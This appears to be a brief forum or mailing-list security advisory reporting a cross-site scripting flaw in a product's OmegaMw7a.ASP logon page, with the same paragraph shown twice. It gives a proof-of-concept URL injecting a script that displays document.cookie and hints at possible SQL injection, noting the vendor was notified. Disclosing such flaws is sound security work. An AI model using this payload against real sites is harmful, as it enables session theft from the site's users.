This also works on serveral web-pages of this product.
http://host/OmegaMw7a.ASP?WCI=Logon&WCE=0;<script>alert(unescape(documen
t.cookie));</script>
There might be some ways for SQL-Injection, too, but i am not willing
to try this at the real system :)
This also works on serveral web-pages of this product.
http://host/OmegaMw7a.ASP?WCI=Logon&WCE=0;<script>alert(unescape(documen
t.cookie));</script>
There might be some ways for SQL-Injection, too, but i am not willing
to try this at the real system :)
Vendor notified as CC
regards
MC.Iglo
[ reply ]